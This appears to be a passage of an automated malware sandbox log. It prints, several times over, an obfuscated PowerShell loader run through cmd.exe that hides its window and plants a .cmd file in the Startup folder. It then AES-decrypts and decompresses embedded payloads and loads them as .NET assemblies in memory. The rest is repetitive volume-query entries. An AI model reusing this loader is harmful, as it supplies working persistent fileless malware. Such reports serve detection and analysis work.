fyfwl($itxzh){$cucrj=[system.security.cryptography.aes]::create();$cucrj.mode=[system.security.cryptography.ciphermode]::cbc;$cucrj.padding=[system.security.cryptography.paddingmode]::pkcs7;$cucrj.key=[system.convert]::($nhes[8])('gdciwm8mumxo7da/mrtcyiboumxu2fksvindt/chsz8=');$cucrj.iv=[system.convert]::($nhes[8])('gcsswi2zcus6f9nnuiiz/q==');$kpffb=$cucrj.($nhes[2])();$bvxzm=$kpffb.($nhes[9])($itxzh,0,$itxzh.length);$kpffb.dispose();$cucrj.dispose();$bvxzm;}function rmdoy($itxzh){$dolaj=new-object system.io.memorystream(,$itxzh);$wpdcq=new-object system.io.memorystream;$mfuws=new-object system.io.compression.gzipstream($dolaj,[io.compression.compressionmode]::($nhes[7]));$mfuws.($nhes[13])($wpdcq);$mfuws.dispose();$dolaj.dispose();$wpdcq.dispose();$wpdcq.toarray();}$iiirz=[system.io.file]::($nhes[3])([console]::title);$bzofj=rmdoy (fyfwl ([convert]::($nhes[8])([system.linq.enumerable]::($nhes[11])($iiirz, 5).substring(2))));$nlfyf=rmdoy (fyfwl ([convert]::($nhes[8])([system.linq.enumerable]::($nhes[11])($iiirz, 6).substring(2))));[system.reflection.assembly]::($nhes[12])([byte[]]$nlfyf).($nhes[0]).($nhes[10])($null,$null);[system.reflection.assembly]::($nhes[12])([byte[]]$bzofj).($nhes[0]).($nhes[10])($null,$null); "
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /s /d /c" echo $host.ui.rawui.windowtitle='c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\network97287man.cmd';$nhes='erlgzntrlgzryrlgzporlgzinrlgztrlgz'.replace('rlgz', ''),'chprlhhprlanhprlgeehprlxthprlenshprlionhprl'.replace('hprl', ''),'crvvloevvloavvlotevvlodevvlocrvvloyvvloptvvloorvvlo'.replace('vvlo', ''),'remtknamtkndlmtkninmtknesmtkn'.replace('mtkn', ''),'sptlablittlab'.replace('tlab', ''),'maishffnshffmoshffdshffulshffeshff'.replace('shff', ''),'getkigbckigburkigbrkigbenkigbtprkigbokigbcekigbsskigb'.replace('kigb', ''),'deccizvomcizvprcizvesscizv'.replace('cizv', ''),'frotqyzmbtqyzasetqyz6tqyz4stqyztrtqyzitqyzngtqyz'.replace('tqyz', ''),'thzggrhzgganshzggfohzggrhzggmfhzgginahzgglblhzggochzggkhzgg'.replace('hzgg', ''),'inuneovouneokeuneo'.replace('uneo', ''),'ellhtjemelhtjntlhtjalhtjtlhtj'.replace('lhtj', ''),'loakqbadkqba'.replace('kqba', ''),'coqgympyqgymtoqgym'.replace('qgym', '');powershell -w hidden;function fyfwl($itxzh){$cucrj=[system.security.cryptography.aes]::create();$cucrj.mode=[system.security.cryptography.ciphermode]::cbc;$cucrj.padding=[system.security.cryptography.paddingmode]::pkcs7;$cucrj.key=[system.convert]::($nhes[8])('gdciwm8mumxo7da/mrtcyiboumxu2fksvindt/chsz8=');$cucrj.iv=[system.convert]::($nhes[8])('gcsswi2zcus6f9nnuiiz/q==');$kpffb=$cucrj.($nhes[2])();$bvxzm=$kpffb.($nhes[9])($itxzh,0,$itxzh.length);$kpffb.dispose();$cucrj.dispose();$bvxzm;}function rmdoy($itxzh){$dolaj=new-object system.io.memorystream(,$itxzh);$wpdcq=new-object system.io.memorystream;$mfuws=new-object system.io.compression.gzipstream($dolaj,[io.compression.compressionmode]::($nhes[7]));$mfuws.($nhes[13])($wpdcq);$mfuws.dispose();$dolaj.dispose();$wpdcq.dispose();$wpdcq.toarray();}$iiirz=[system.io.file]::($nhes[3])([console]::title);$bzofj=rmdoy (fyfwl ([convert]::($nhes[8])([system.linq.enumerable]::($nhes[11])($iiirz, 5).substring(2))));$nlfyf=rmdoy (fyfwl ([convert]::($nhes[8])([system.linq.enumerable]::($nhes[11])($iiirz, 6).substring(2))));[system.reflection.assembly]::($nhes[12])([byte[]]$nlfyf).($nhes[0]).($nhes[10])($null,$null);[system.reflection.assembly]::($nhes[12])([byte[]]$bzofj).($nhes[0]).($nhes[10])($null,$null); "
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /s /d /c" echo $host.ui.rawui.windowtitle='c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\network97287man.cmd';$nhes='erlgzntrlgzryrlgzporlgzinrlgztrlgz'.replace('rlgz', ''),'chprlhhprlanhprlgeehprlxthprlenshprlionhprl'.replace('hprl', ''),'crvvloevvloavvlotevvlodevvlocrvvloyvvloptvvloorvvlo'.replace('vvlo', ''),'remtknamtkndlmtkninmtknesmtkn'.replace('mtkn', ''),'sptlablittlab'.replace('tlab', ''),'maishffnshffmoshffdshffulshffeshff'.replace('shff', ''),'getkigbckigburkigbrkigbenkigbtprkigbokigbcekigbsskigb'.replace('kigb', ''),'deccizvomcizvprcizvesscizv'.replace('cizv', ''),'frotqyzmbtqyzasetqyz6tqyz4stqyztrtqyzitqyzngtqyz'.replace('tqyz', ''),'thzggrhzgganshzggfohzggrhzggmfhzgginahzgglblhzggochzggkhzgg'.replace('hzgg', ''),'inuneovouneokeuneo'.replace('uneo', ''),'ellhtjemelhtjntlhtjalhtjtlhtj'.replace('lhtj', ''),'loakqbadkqba'.replace('kqba', ''),'coqgympyqgymtoqgym'.replace('qgym', '');powershell -w hidden;function fyfwl($itxzh){$cucrj=[system.security.cryptography.aes]::create();$cucrj.mode=[system.security.cryptography.ciphermode]::cbc;$cucrj.padding=[system.security.cryptography.paddingmode]::pkcs7;$cucrj.key=[system.convert]::($nhes[8])('gdciwm8mumxo7da/mrtcyiboumxu2fksvindt/chsz8=');$cucrj.iv=[system.convert]::($nhes[8])('gcsswi2zcus6f9nnuiiz/q==');$kpffb=$cucrj.($nhes[2])();$bvxzm=$kpffb.($nhes[9])($itxzh,0,$itxzh.length);$kpffb.dispose();$cucrj.dispose();$bvxzm;}function rmdoy($itxzh){$dolaj=new-object system.io.memorystream(,$itxzh);$wpdcq=new-object system.io.memorystream;$mfuws=new-object system.io.compression.gzipstream($dolaj,[io.compression.compressionmode]::($nhes[7]));$mfuws.($nhes[13])($wpdcq);$mfuws.dispose();$dolaj.dispose();$wpdcq.dispose();$wpdcq.toarray();}$iiirz=[system.io.file]::($nhes[3])([console]::title);$bzofj=rmdoy (fyfwl ([convert]::($nhes[8])([system.linq.enumerable]::($nhes[11])($iiirz, 5).substring(2))));$nlfyf=rmdoy (fyfwl ([convert]::($nhes[8])([system.linq.enumerable]::($nhes[11])($iiirz, 6).substring(2))));[system.reflection.assembly]::($nhes[12])([byte[]]$nlfyf).($nhes[0]).($nhes[10])($null,$null);[system.reflection.assembly]::($nhes[12])([byte[]]$bzofj).($nhes[0]).($nhes[10])($null,$null); "
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /s /d /c" echo $host.ui.rawui.windowtitle='c:\users\user\appdata\local\temp\c.bat';$nhes='erlgzntrlgzryrlgzporlgzinrlgztrlgz'.replace('rlgz', ''),'chprlhhprlanhprlgeehprlxthprlenshprlionhprl'.replace('hprl', ''),'crvvloevvloavvlotevvlodevvlocrvvloyvvloptvvloorvvlo'.replace('vvlo', ''),'remtknamtkndlmtkninmtknesmtkn'.replace('mtkn', ''),'sptlablittlab'.replace('tlab', ''),'maishffnshffmoshffdshffulshffeshff'.replace('shff', ''),'getkigbckigburkigbrkigbenkigbtprkigbokigbcekigbsskigb'.replace('kigb', ''),'deccizvomcizvprcizvesscizv'.replace('cizv', ''),'frotqyzmbtqyzasetqyz6tqyz4stqyztrtqyzitqyzngtqyz'.replace('tqyz', ''),'thzggrhzgganshzggfohzggrhzggmfhzgginahzgglblhzggochzggkhzgg'.replace('hzgg', ''),'inuneovouneokeuneo'.replace('uneo', ''),'ellhtjemelhtjntlhtjalhtjtlhtj'.replace('lhtj', ''),'loakqbadkqba'.replace('kqba', ''),'coqgympyqgymtoqgym'.replace('qgym', '');powershell -w hidden;function fyfwl($itxzh){$cucrj=[system.security.cryptography.aes]::create();$cucrj.mode=[system.security.cryptography.ciphermode]::cbc;$cucrj.padding=[system.security.cryptography.paddingmode]::pkcs7;$cucrj.key=[system.convert]::($nhes[8])('gdciwm8mumxo7da/mrtcyiboumxu2fksvindt/chsz8=');$cucrj.iv=[system.convert]::($nhes[8])('gcsswi2zcus6f9nnuiiz/q==');$kpffb=$cucrj.($nhes[2])();$bvxzm=$kpffb.($nhes[9])($itxzh,0,$itxzh.length);$kpffb.dispose();$cucrj.dispose();$bvxzm;}function rmdoy($itxzh){$dolaj=new-object system.io.memorystream(,$itxzh);$wpdcq=new-object system.io.memorystream;$mfuws=new-object system.io.compression.gzipstream($dolaj,[io.compression.compressionmode]::($nhes[7]));$mfuws.($nhes[13])($wpdcq);$mfuws.dispose();$dolaj.dispose();$wpdcq.dispose();$wpdcq.toarray();}$iiirz=[system.io.file]::($nhes[3])([console]::title);$bzofj=rmdoy (fyfwl ([convert]::($nhes[8])([system.linq.enumerable]::($nhes[11])($iiirz, 5).substring(2))));$nlfyf=rmdoy (fyfwl ([convert]::($nhes[8])([system.linq.enumerable]::($nhes[11])($iiirz, 6).substring(2))));[system.reflection.assembly]::($nhes[12])([byte[]]$nlfyf).($nhes[0]).($nhes[10])($null,$null);[system.reflection.assembly]::($nhes[12])([byte[]]$bzofj).($nhes[0]).($nhes[10])($null,$null); "Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /s /d /c" echo $host.ui.rawui.windowtitle='c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\network97287man.cmd';$nhes='erlgzntrlgzryrlgzporlgzinrlgztrlgz'.replace('rlgz', ''),'chprlhhprlanhprlgeehprlxthprlenshprlionhprl'.replace('hprl', ''),'crvvloevvloavvlotevvlodevvlocrvvloyvvloptvvloorvvlo'.replace('vvlo', ''),'remtknamtkndlmtkninmtknesmtkn'.replace('mtkn', ''),'sptlablittlab'.replace('tlab', ''),'maishffnshffmoshffdshffulshffeshff'.replace('shff', ''),'getkigbckigburkigbrkigbenkigbtprkigbokigbcekigbsskigb'.replace('kigb', ''),'deccizvomcizvprcizvesscizv'.replace('cizv', ''),'frotqyzmbtqyzasetqyz6tqyz4stqyztrtqyzitqyzngtqyz'.replace('tqyz', ''),'thzggrhzgganshzggfohzggrhzggmfhzgginahzgglblhzggochzggkhzgg'.replace('hzgg', ''),'inuneovouneokeuneo'.replace('uneo', ''),'ellhtjemelhtjntlhtjalhtjtlhtj'.replace('lhtj', ''),'loakqbadkqba'.replace('kqba', ''),'coqgympyqgymtoqgym'.replace('qgym', '');powershell -w hidden;function fyfwl($itxzh){$cucrj=[system.security.cryptography.aes]::create();$cucrj.mode=[system.security.cryptography.ciphermode]::cbc;$cucrj.padding=[system.security.cryptography.paddingmode]::pkcs7;$cucrj.key=[system.convert]::($nhes[8])('gdciwm8mumxo7da/mrtcyiboumxu2fksvindt/chsz8=');$cucrj.iv=[system.convert]::($nhes[8])('gcsswi2zcus6f9nnuiiz/q==');$kpffb=$cucrj.($nhes[2])();$bvxzm=$kpffb.($nhes[9])($itxzh,0,$itxzh.length);$kpffb.dispose();$cucrj.dispose();$bvxzm;}function rmdoy($itxzh){$dolaj=new-object system.io.memorystream(,$itxzh);$wpdcq=new-object system.io.memorystream;$mfuws=new-object system.io.compression.gzipstream($dolaj,[io.compression.compressionmode]::($nhes[7]));$mfuws.($nhes[13])($wpdcq);$mfuws.dispose();$dolaj.dispose();$wpdcq.dispose();$wpdcq.toarray();}$iiirz=[system.io.file]::($nhes[3])([console]::title);$bzofj=rmdoy (fyfwl ([convert]::($nhes[8])([system.linq.enumerable]::($nhes[11])($iiirz, 5).substring(2))));$nlfyf=rmdoy (fyfwl ([convert]::($nhes[8])([system.linq.enumerable]::($nhes[11])($iiirz, 6).substring(2))));[system.reflection.assembly]::($nhes[12])([byte[]]$nlfyf).($nhes[0]).($nhes[10])($null,$null);[system.reflection.assembly]::($nhes[12])([byte[]]$bzofj).($nhes[0]).($nhes[10])($null,$null); "Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /s /d /c" echo $host.ui.rawui.windowtitle='c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\network97287man.cmd';$nhes='erlgzntrlgzryrlgzporlgzinrlgztrlgz'.replace('rlgz', ''),'chprlhhprlanhprlgeehprlxthprlenshprlionhprl'.replace('hprl', ''),'crvvloevvloavvlotevvlodevvlocrvvloyvvloptvvloorvvlo'.replace('vvlo', ''),'remtknamtkndlmtkninmtknesmtkn'.replace('mtkn', ''),'sptlablittlab'.replace('tlab', ''),'maishffnshffmoshffdshffulshffeshff'.replace('shff', ''),'getkigbckigburkigbrkigbenkigbtprkigbokigbcekigbsskigb'.replace('kigb', ''),'deccizvomcizvprcizvesscizv'.replace('cizv', ''),'frotqyzmbtqyzasetqyz6tqyz4stqyztrtqyzitqyzngtqyz'.replace('tqyz', ''),'thzggrhzgganshzggfohzggrhzggmfhzgginahzgglblhzggochzggkhzgg'.replace('hzgg', ''),'inuneovouneokeuneo'.replace('uneo', ''),'ellhtjemelhtjntlhtjalhtjtlhtj'.replace('lhtj', ''),'loakqbadkqba'.replace('kqba', ''),'coqgympyqgymtoqgym'.replace('qgym', '');powershell -w hidden;function fyfwl($itxzh){$cucrj=[system.security.cryptography.aes]::create();$cucrj.mode=[system.security.cryptography.ciphermode]::cbc;$cucrj.padding=[system.security.cryptography.paddingmode]::pkcs7;$cucrj.key=[system.convert]::($nhes[8])('gdciwm8mumxo7da/mrtcyiboumxu2fksvindt/chsz8=');$cucrj.iv=[system.convert]::($nhes[8])('gcsswi2zcus6f9nnuiiz/q==');$kpffb=$cucrj.($nhes[2])();$bvxzm=$kpffb.($nhes[9])($itxzh,0,$itxzh.length);$kpffb.dispose();$cucrj.dispose();$bvxzm;}function rmdoy($itxzh){$dolaj=new-object system.io.memorystream(,$itxzh);$wpdcq=new-object system.io.memorystream;$mfuws=new-object system.io.compression.gzipstream($dolaj,[io.compression.compressionmode]::($nhes[7]));$mfuws.($nhes[13])($wpdcq);$mfuws.dispose();$dolaj.dispose();$wpdcq.dispose();$wpdcq.toarray();}$iiirz=[system.io.file]::($nhes[3])([console]::title);$bzofj=rmdoy (fyfwl ([convert]::($nhes[8])([system.linq.enumerable]::($nhes[11])($iiirz, 5).substring(2))));$nlfyf=rmdoy (fyfwl ([convert]::($nhes[8])([system.linq.enumerable]::($nhes[11])($iiirz, 6).substring(2))));[system.reflection.assembly]::($nhes[12])([byte[]]$nlfyf).($nhes[0]).($nhes[10])($null,$null);[system.reflection.assembly]::($nhes[12])([byte[]]$bzofj).($nhes[0]).($nhes[10])($null,$null); "Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
